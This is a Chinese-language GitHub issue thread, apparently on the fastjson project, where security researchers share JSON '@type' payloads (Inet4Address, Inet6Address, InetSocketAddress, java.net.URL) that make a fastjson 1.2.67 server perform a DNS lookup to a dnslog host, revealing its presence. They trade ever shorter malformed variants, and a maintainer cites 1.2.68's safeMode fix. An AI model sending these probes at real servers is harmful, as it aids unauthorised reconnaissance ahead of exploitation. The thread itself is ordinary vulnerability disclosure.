发现最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson

[c0ny1]

java.net.InetAddress虽然被禁止了，但是依然可以使用如下两个payload探测后端是否是fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

[c0ny1]

而且无需开启autotype

[k3mlol]

java.net.InetAddress虽然被禁止了，但是依然可以使用如下两个payload探测后端是否是fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

nice work, thx!

[retanoj]

我再发一个畸形的

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

[c0ny1]

@retanoj nb，下午也刚好和其他师傅聊到这个payload

[qixiaobo]

新知识get

[retanoj]

还有很早的那个ysoserial里的由HashMap触发的URLDNS也能用，只不过也有点畸形

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

然而都没啥卵用啊，只能发个dns

[fnmsd]

学习了

[threedr3am]

不造你为啥要变那么畸形

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

[k3mlol]

看样子，最新的bypass也快出来了:)

[retanoj]

@threedr3am
赞，再短点

Set[{"@type":"java.net.URL","val":"dnslog"}]

再短

Set[{"@type":"java.net.URL","val":"dnslog"}

再

{{"@type":"java.net.URL","val":"dnslog"}:0

[T4di5]

amazing ：-）

[Wfzsec]

tql

[ghost]

能获取到啥敏感信息吗

[wenshao]

https://github.com/alibaba/fastjson/releases/tag/1.2.68
1.2.68版本提供了safeMode配置，可以完全禁用autoType，包括白名单和黑名单。

[rainbow456]

@retanoj 师傅，以上畸形的payload只能探测到存在fastjson是么？实际利用有什么思路么？

[retanoj]

@retanoj 师傅，以上畸形的payload只能探测到存在fastjson是么？实际利用有什么思路么？

java.net.Inet4Address 这个payload只能发dns，没有利用方法了吧